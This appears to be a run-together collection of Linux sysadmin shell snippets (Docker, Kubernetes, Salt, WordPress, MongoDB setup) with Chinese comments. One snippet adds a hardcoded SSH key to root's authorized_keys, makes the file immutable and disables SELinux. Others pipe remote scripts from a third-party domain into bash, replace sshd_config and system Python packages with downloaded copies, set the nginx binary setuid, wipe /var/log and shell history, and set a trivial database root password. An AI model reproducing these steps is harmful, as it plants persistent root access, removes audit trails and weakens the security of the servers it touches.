k8sssl for item in `find /etc/kubernetes/pki -maxdepth 2 -name "*.crt"`;do openssl x509 -in $item -text -noout| grep Not;echo ======================$item===============;donek8s #/etc/systemd/system/kubelet.service.d/10-kubeadm.conf
#systemctl daemon-reload;systemctl restart kubelet
[ -d /etc/modules-load.d ]||mkdir -p /etc/modules-load.d
[ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_modules-load.d_k8s.conf -O /etc/modules-load.d/k8s.conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/etc_sysctl.d_k8s.conf -O /etc/sysctl.d/k8s.conf
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
cat <acme ./acme.sh --issue --dns dns_ali --dnssleep 30 -d $1 -d *.$1
./acme.sh --issue --dns dns_dp --dnssleep 30 -d $1 -d *.$1dl docker run -d -p 80:8000 --restart=always --name=filelist -v /opt/files:/home/ywgx/1/filelist/files ywgx/filelistdi docker exec -it `docker ps|grep -v IMAGE|head -n 1|awk '{print $1}'` /bin/shfilelist curl -LO https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose.yml
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/docker-compose -o /usr/local/bin/docker-compose && chmod +x /usr/local/bin/docker-compose
/usr/local/bin/docker-compose -f docker-compose.yml up -ddr #清理没有运行的 Docker 镜像 docker image prune
#没有被任何容器使用的镜像,同时删除未被使用的数据卷和网络
docker image prune --all --force;docker system prune -a -faliyun_vms pip3 install aliyun-python-sdk-dyvmsapids #停止所有容器
docker stop $(docker ps -aq) 2>/dev/null
docker rm $(docker ps -aq) 2>/dev/nulldockercn [ -d /etc/docker ]||mkdir -p /etc/docker
tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://registry.docker-cn.com"]
}
EOF
systemctl restart dockerdd #删除所有镜像
docker stop $(docker ps -aq) 2>/dev/null
docker system prune -a -f
docker rm $(docker ps -aq) 2>/dev/null
docker rmi -f $(docker images -q) 2>/dev/nullaliyun [ -d /etc/docker ]||mkdir -p /etc/docker
tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://7u4xdzci.mirror.aliyuncs.com"]
}
EOF
systemctl restart dockerdocker cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
curl -L https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo
yum install -y docker-ce
systemctl daemon-reload
systemctl enable docker.service
systemctl start docker
fi
if [ "$OS" = "Debian" ];then
sudo apt-get remove docker docker-engine docker.io containerd runc
sudo apt-get update
sudo apt-get -y install apt-transport-https ca-certificates curl gnupg lsb-release
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update
apt-get -y install docker-ce docker-ce-cli containerd.io docker-compose
service docker restart
fi
#docker run hello-world
#docker run -d -p 80:8000 --restart=always -v /opt/files:/opt/files ywgx/filelist:alpine
#docker rmi $name 删除镜像
#docker container prune 清理所有处于终止状态的容器
#docker run -d -p 5000:5000 --restart=always --name registry -v /opt/data/registry:/var/lib/registry registry 安装运行 docker-registry
#docker build -t ywgx/filelist . 使用Dockerfile文件 build 构建一个镜像名称 ywgx/filelist
#docker tag $container_id ywgx/test:dev 为镜像添加一个新的标签
#docker tag ywgx/filelist filelist 为镜像ywgx/filelist添加新标签 filelist
#docker search $name 查询镜像
#docker export $container_id > container.tar 导出容器
#docker save -o busybox.tar busybox 导出
#docker load -i busybox.tar 导入
$docker rm -f $container_id 删除容器
#docker run -d -p 80:5000 training/webapp python app.py 后台启动容器并映射本地端口 80
#docker port $container_id 或者 $name 查看容器端口
#docker logs -f $container_id 查看容器内部标准输出
#docker top $name 查看容器内部运行的进程
#cat container.tar | docker import - centos:v1 导入容器到镜像 centos:v1
#docker inspect $name 检查容器的配置和状态信息
#docker run -itd --name ubuntu-test ubuntu 运行容器,并且可以通过 exec 命令进入 ubuntu 容器
#docker run -itd --name centos-test centos 运行容器,并且可以通过 exec 命令进入 centos 容器
#docker commit -m="filelist" -a="ywgx" e218edb10161 ywgx/filelist:v2
#docker image prune -a 删除没有运行的容器镜像
#数据卷
#创建:docker volume create
#删除某个卷:docker volume rm 卷名
#删除所有未使用的卷:docker volume prune
#列出所有卷:docker volume ls
#查看某个卷的信息:docker volume inspect 卷名
#新建一个 Docker 网络
# docker network create -d bridge test-net
# docker run -itd --name test1 --network test-net ubuntu /bin/bash 运行一个容器并连接到新建的 test-net 网络
# docker run -itd --name test2 --network test-net ubuntu /bin/bash 再运行一个容器并连接到新建的 test-net 网络
# test1 容器和 test2 容器建立了互联关系,两个容器直接可以互相ping通
# COPY 和 ADD 指令中选择的时候,可以遵循这样的原则,所有的文件复制均使用 COPY 指令,仅在需要自动解压缩的场合使用 ADD。
# 查看仓库中的镜像 curl 127.0.0.1:5000/v2/_catalog
# 配置DNS
#我们可以在宿主机的 /etc/docker/daemon.json 文件中增加以下内容来设置全部容器的 DNS
#{
# "dns" : [
# "114.114.114.114",
# "8.8.8.8"
# ]
#}
#systemctl restart docker
#docker exec -it $container_id /bin/bash 进入容器ss #ss命令可以查看系统中启动的端口信息,该命令常用选项如下:
#-a显示所有端口的信息
#-n以数字格式显示端口号
#-t显示TCP连接的端口
#-u显示UDP连接的端口
#-l显示服务正在监听的端口信息,如httpd启动后,会一直监听80端口
#-p显示监听端口的服务名称是什么(也就是程序名称)
ss -antulpalpine apk add gcc musl-dev
apk add build-baserb pgrep filelist.py|xargs kill -9 &>/dev/null
pgrep filelist.py|xargs kill -9 &>/dev/null
sleep 1;cd /home/ywgx/1/filelist/;./filelist.py --auth=true --debug=false --port=10000 --root=/home/ywgx/data/filelist &>/home/ywgx/logs/filelist.log &
sleep 3;cd /home/ywgx/1/filelist/;./filelist.py --auth=false --debug=false --port=8000 --root=/home/ywgx/data/download &>/home/ywgx/logs/download.log &
ps aux|grep filelist|grep -v grepcpu 1. 调整CPU频率 cpupower frequency-set -u 2500MHz
cat /proc/cpuinfo | grep 'cpu MHz'
st #字符串加解密 $SALT 是盐字符串,作为 gitlab-ci 全局变量,只有管理员知道
#加密: echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfig
#解密: cat secret_kubeconfig | openssl aes-256-cbc -d -salt -pbkdf2 -k $SALT |base64 -d > config
export SALT=HELLOWORLD
echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfighf if ! grep -q "hfzp" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7cDLbprh+i930XUqo81RXjaLg4Kot5L9aiB789V4L/mDfV7ZeW6k2S1bdIGUrtSmFZnmA/2HQKid102mEzp8Y2/xkwXoTM/hsah+X8DXLX5/xwUb2XuhqZSJy+x/6MLC9MGjvQGFpqvaK1fJZzjFxZaaHoC79iJWbYCzBLo2n+EcmmX559gAgcUSSvjsUQRAy7f+/1Hp/cLB+rqTMVoNgeAZGgMV6QNoxpZlKWSTFeicxN/sNgy6FLpLOyuX5xwsYfpaDdZd+MYlG69XDIakh4cy+kg9q6nQ2bYOw3GhdNMSNnlsU7XkY872OUCTodZ8iu24AvqFE1kxCaIp8egAD hfzp" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +ai /root/.ssh/authorized_keys
fi
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/configcity curl -s --connect-timeout 5 https://ipinfo.io/44.192.95.161/city;curl -s --connect-timeout 5 http://freeapi.ipip.net/44.192.95.161zola nohup ~/bin/zola serve --interface 0.0.0.0 --port 3003 --base-url / &>~/logs/zola-docs.log &hm helm init --stable-repo-url https://charts.helm.sh/stable --service-account tiller
helm init --client-only --skip-refresh
helm repo rm stable
helm repo add stable https://charts.helm.sh/stablesredis BUILD=/tmp/ywgx
[ -d $BUILD ]||mkdir -p $BUILD
cd $BUILD
wget -t 3 http://download.redis.io/redis-stable.tar.gz -O -|tar xfz -
cd redis*/
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
CC=clang make
fi
if [ "$OS" = "Debian" ]
CC=clang make MALLOC=libc
fi
#cd src/
#for i in `find . -perm -0755 -a ! -type d`;do mv $i $REDIS_BIN/;donec rm -f /etc/motd
hostnamectl --static set-hostname central-44.192.95.161;
yum -y update
yum -y install epel-release
yum -y install wget gcc gcc-c++ make vim pcre-devel libffi-devel openssl-devel python-devel libevent-devel postgresql-devel readline-devel perl-ExtUtils-Embed iptables iptables-services inotify-tools bzip2 unzip rsync psmisc python3-devel net-tools
yum -y install bash-completion
yum -y install python-pip
yum -y install chrony
#yum -y erase sudo
yum clean all
curl -s xabc.io/awscli|bash
timedatectl set-timezone Asia/Shanghai
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/xabc.sh -o /etc/profile.d/xabc.sh
chmod 644 /etc/profile.d/xabc.sh
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/vim.tgz -O -|tar xzf - -C ~
[ -d /root/.pip ]||mkdir -p /root/.pip
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip.conf -o /root/.pip/pip.conf
pip2 install pip==9.0.3
pip2 install --upgrade setuptools==30.1.0
pip2 install --upgrade Cython redis pyOpenSSL
pip2 install functions==0.7.0
pip2 install tornado==5.1.1
pip2 install redis==3.5.3
pip2 install tornadio2==0.0.4
pip2 install tornado_jinja2==0.2.4
pip2 install psycopg2-binary==2.8.6
pip2 install Pillow==2.0.0
pip2 install paramiko==2.7.2
pip2 install sqlalchemy==1.3.20
pip2 install sqlalchemy_utils==0.36.6
pip2 install influxdb==5.3.1
pip2 install futures==3.1.1
pip2 install ujson==2.0.3
pip2 install mako
mv /usr/lib/python2.7/site-packages /usr/lib/python2.7/site-packages.bk
mv /usr/lib64/python2.7/site-packages /usr/lib64/python2.7/site-packages.bk
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages.tgz -O -|tar xzf - -C /usr/lib/python2.7
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/site-packages-64.tgz -O -|tar xzf - -C /usr/lib64/python2.7
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum -y clean expire-cache
yum -y install salt-master salt-minion salt-api salt-ssh
pip3 install -U pip setuptools
pip3 install redis==3.5.3 flask cryptography pyinotify influxdb salt-pepper gevent pymongo
pip3 install aliyun-python-sdk-dyvmsapi
echo `hostname` > /etc/salt/minion_id
systemctl enable salt-master.service
systemctl enable salt-api.service
systemctl enable chrony
systemctl disable firewalld.service &>/dev/null
curl -L https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/master -o /etc/salt/master
[ -d /srv/salt/user ]||mkdir -p /srv/salt/user
[ -d /srv/zero/0 ]||mkdir -p /srv/zero/0
[ -d /srv/zero/1 ]||mkdir -p /srv/zero/1
[ -d /srv/zero/2 ]||mkdir -p /srv/zero/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/node.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/grafana.tgz -O -|tar xzf - -C /srv/zero/1
#wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/matrix.tgz -O -|tar xzf - -C /srv/zero/1
ln -fs /srv/zero/1/node/bin/npm /usr/bin/npm
ln -fs /srv/zero/1/node/bin/node /usr/bin/node
chmod 100 /srv/zero/2/redis/bin/*
ln -fs /srv/zero/2/redis/bin/redis-cli /usr/local/bin/
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx
yum install -y postgresql-server
service postgresql initdb
service postgresql start
service salt-master start
systemctl enable postgresql.service
[ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
chmod 755 /etc/rc.d/rc.local
systemctl disable salt-minion.service
#wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/build.tgz -O -|tar xzf - -C /srv/salt
rm -fr /var/log /var/cache/salt/minion /root/.bash_history
IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1)
REGION=$(curl -s -m 5 http://ip-api.com/line/44.192.95.161?fields=city);[ -n "$REGION" ]||REGION="Shanghai"
printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器在同一个内网请在 Login 机器执行 # curl -s xabc.io/l-$IP-$REGION|bash 继续完成对 Login 的基础部署"
printf "\033[1;32;40m%s\033[0m\n-----------------\n" "Master 和 Central 机器在同一个内网请在 Master 机器执行 # curl -s xabc.io/m-$IP-$REGION|bash 继续完成对 Master 的基础部署"
printf "\033[1;32;40m%s\033[0m\n" "Login 和 Central 机器不在同一内网请在 Login 机器执行 # curl -s xabc.io/l-44.192.95.161-$REGION|bash 继续完成对 Login 的基础部署"
printf "\033[1;32;40m%s\033[0m\n" "Master 和 Central 机器不在同一内网请在 Master 机器执行 # curl -s xabc.io/m-44.192.95.161-$REGION|bash 继续完成对 Master 的基础部署"
printf "\033[1;32;31m%s\033[0m\n" "特别说明 $REGION 这个字段代表网络区域信息,可根据实际情况改成自己机器所在区域标识信息,同一网络节点内login,master机器,其region标识信息一致,如Beijing,必须与/srv/pillar/central.sls 里面 region 定义一致"mac #scutil --set ComputerName "E"
#scutil --set LocalHostName "E"
#scutil --set HostName "E"
#nvram AutoBoot=%00 关闭开盖启动
#nvram AutoBoot=%03 恢复开盖启动
#sudo defaults write /Library/Preferences/com.apple.loginwindow SHOWOTHERUSERS_MANAGED -bool FALSE 删除开机界面上的 “其他”用户登陆选项
#pwpolicy -clearaccountpolicies 运行后,可以设置2位密码i0 if [ $USER = ywgx ];then
[ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf
[ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key
[ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost
chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx
pgrep nginx||~/0/openresty/nginx/sbin/nginx
fii1 if [ $USER = ywgx ];then
[ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1
fii2 if [ $USER = ywgx ];then
[ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2
[ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2
fissl proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-NginX-Proxy true;
proxy_set_header Connection "";
log_format main "$status $request_time $request_method $host$request_uri [$http_user_agent] [$time_local] [$http_x_forwarded_for $remote_addr] $http_referer";
access_log logs/access.log main;
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4:!DH:!DHE;
ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
upstream EX{
keepalive 64;
server 127.0.0.1:7001;
}
server{
listen 80;
listen 443 ssl http2;
server_name EX;
ssl_certificate ssl/EX.pem;
ssl_certificate_key ssl/EX.key;
location /{
proxy_pass http://EX;
}
}ssh mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bk
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/sshd_config -O /etc/ssh/sshd_config
systemctl restart sshd.servicechrony cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install epel-release
yum -y install chrony
systemctl enable chrony
systemctl restart chronyd
fi
if [ "$OS" = "Debian" ];then
apt-get -y install chrony
chkconfig --add chronyd
fi
timedatectl set-timezone Asia/Shanghaijava java -Xmx3550m -Xms3550m -Xmn2g -Xss128k
-Xmx3550m:设置JVM最大可用内存为3550M。
-Xms3550m:设置JVM促使内存为3550m。此值可以设置与-Xmx相同,以避免每次垃圾回收完成后JVM重新分配内存。
#以 java 进程所在用户执行,获取 heap dump 文件
#jmap -dump:format=b,file=heap.hprof
#获取thread dump文件
#jstack > thread.txtmongo echo doing...
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/mongodb/mongo.tgz -O -|tar xzf - -C /opt
echo 65535 > /proc/sys/net/core/somaxconn
echo never > /sys/kernel/mm/transparent_hugepage/defrag
echo never > /sys/kernel/mm/transparent_hugepage/enabled
pgrep mongod||/opt/mongo/bin/mongod -f /opt/mongo/conf/mongod.confc1 curl -s xabc.io/b|bash
curl -s xabc.io/v|bash
timedatectl set-timezone Asia/Shanghai
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
[ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local
hostnamectl --static set-hostname central-44.192.95.161;
systemctl disable firewalld
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
yum -y install salt-master
yum -y install salt-minion
yum -y install salt-ssh
pip3 install redis flask cryptography pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service
[ -d /srv/salt ]||mkdir -p /srv/salt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/iptables -O /etc/sysconfig/iptables
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/master/master -O /etc/salt/master
systemctl restart salt-master.service
[ -d /srv/zero/0 ]||mkdir -p /srv/zero/0
[ -d /srv/zero/1 ]||mkdir -p /srv/zero/1
[ -d /srv/zero/2 ]||mkdir -p /srv/zero/2
[ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/O.tgz -O -|tar xzf - -C /srv/zero/0
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/P.tgz -O -|tar xzf - -C /srv/zero/1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/matrix/R.tgz -O -|tar xzf - -C /srv/zero/2wordpress cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
if [ "$OS" = "RedHat" ]
then
yum -y install yum-utils
yum -y install epel-release
yum -y install vim wget bzip2 unzip rsync
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
yum -y install MariaDB-server MariaDB-client
yum -y install php72w
yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
systemctl start mariadb
[ -d /etc/rc.d ]||mkdir -p /etc/rc.d
[ -d /etc/php-fpm.d ]||mkdir -p /etc/php-fpm.d
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/RedHat-php.conf -O /etc/php-fpm.d/www.conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.d/rc.local
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/mysql-server.cnf -O /etc/my.cnf.d/server.cnf
chmod 755 /etc/rc.d/rc.local
mysql <<- EOF
set password for root@localhost=password('io');
create database wordpress;
EOF
systemctl restart mariadb
systemctl restart php-fpm
systemctl enable mariadb
systemctl enable php-fpm
fi
if [ "$OS" = "Debian" ]
then
apt-get -y update
apt-get -y install vim wget bzip2 unzip rsync
apt-get -y remove apache2
apt-get -y install php7.[0-9]
apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm
apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc
apt-get -y install mysql-server --allow-unauthenticated
mysql -pio<<- EOF
create database wordpress;
EOF
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/Debian-php.conf -O `find /etc/php/ -name www.conf`
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-rc.local.conf -O /etc/rc.local
chmod 755 /etc/rc.local
systemctl restart mysql
/etc/init.d/php*-fpm restart
fi
[ -d /opt/sys ]||mkdir -p /opt/sys
[ -d /var/log/php-fpm ]||mkdir -p /var/log/php-fpm
[ -d /var/log/mariadb ]||mkdir -p /var/log/mariadb
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/wordpress-start.sh -O /opt/sys/wordpress-start.sh
chown -R nobody.nobody /opt/openresty
chown -R nobody.nobody /opt/wordpress
chown root.nobody /opt/openresty/nginx/sbin/nginx
chmod +xs /opt/openresty/nginx/sbin/nginx
chmod 700 /opt/sys/wordpress-start.sh
pgrep nginx||/opt/openresty/nginx/sbin/nginxbase cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install epel-release
yum -y install bash-completion
yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang
yum -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools bind-utils telnet openssh-clients pcre openssl
fi
if [ "$OS" = "Debian" ];then
apt-get -y update
apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential clang
apt-get -q -y install vim wget curl zip bzip2 unzip rsync psmisc net-tools dnsutils telnet
fiinfluxdb echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
INFLUXDB_VER=1.7.8
if [ "$OS" = "RedHat" ]
then
yum -y install yum-utils
yum -y localinstall https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb-${INFLUXDB_VER}.x86_64.rpm
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/file/influxdb.repo -O /etc/yum.repos.d/influxdb.repo
fi
if [ "$OS" = "Debian" ]
then
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/influxdb_${INFLUXDB_VER}_amd64.deb
dpkg -i influxdb_${INFLUXDB_VER}_amd64.deb
rm -f influxdb_${INFLUXDB_VER}_amd64.deb
fiinit yum update -y
curl -s xabc.io/a|bash
curl -s xabc.io/k|bash
rm -rf /var/log;mkdir -p /var/log
rebootg salt \* saltutil.sync_grainsistio echo doing...
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/istio.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/istio/xabc-istio.sh -O /etc/profile.d/xabc-istio.sh
echo /opt/istiodep curl https://raw.githubusercontent.com/golang/dep/master/install.sh|bashgo wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/go.tgz -O -|tar xzf - -C /usr/local
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/xabc-go.sh -O /etc/profile.d/xabc-go.shto tail -f access.log|awk '$2 > 2 {print $0}'y ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1h cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
CPU=`cat /proc/cpuinfo|grep "processor"|wc -l`
MEM=`free|awk '/Mem/ {print int(($2+1048576)/1048576)}'`
echo "$OS $CPU $MEM"busybox [ -d /usr/local/bin ]||mkdir -p /usr/local/bin
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/busybox -O /usr/local/bin/busybox
chmod +x /usr/local/bin/busyboxpycurl mkdir -p /tmp/build&&cd /tmp/build
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/curl-7.43.0.tar.gz -O -|tar xzf -
cd curl-7.43.0
./configure
make && make install
mv /usr/lib64/libcurl.so.4* /tmp/
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0
ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4
pip3 install pycurlq echo doing...
find / -empty -mtime +7 ! -path "/proc/*" -a ! -path "/sys/*" -a ! -path "/etc/*" ! -path "/boot/*" -type f -a -name "*.log" -delete
for i in $(find `du -s /* --exclude={proc,etc,sys,boot,run,mnt}|sort -nr|head -7|awk '{print $2}'|tr '\n' ' '` -type f -a -name "*.log" ! -name ".xabc.log" ! -name ".usercmd.log" ! -name "usercmd.log" ! -name ".sys.log" -o -name "catalina.out");do echo $i;> $i;donepandas import pandas as pd
pd.set_option('display.max_rows', 10000) #最大行数
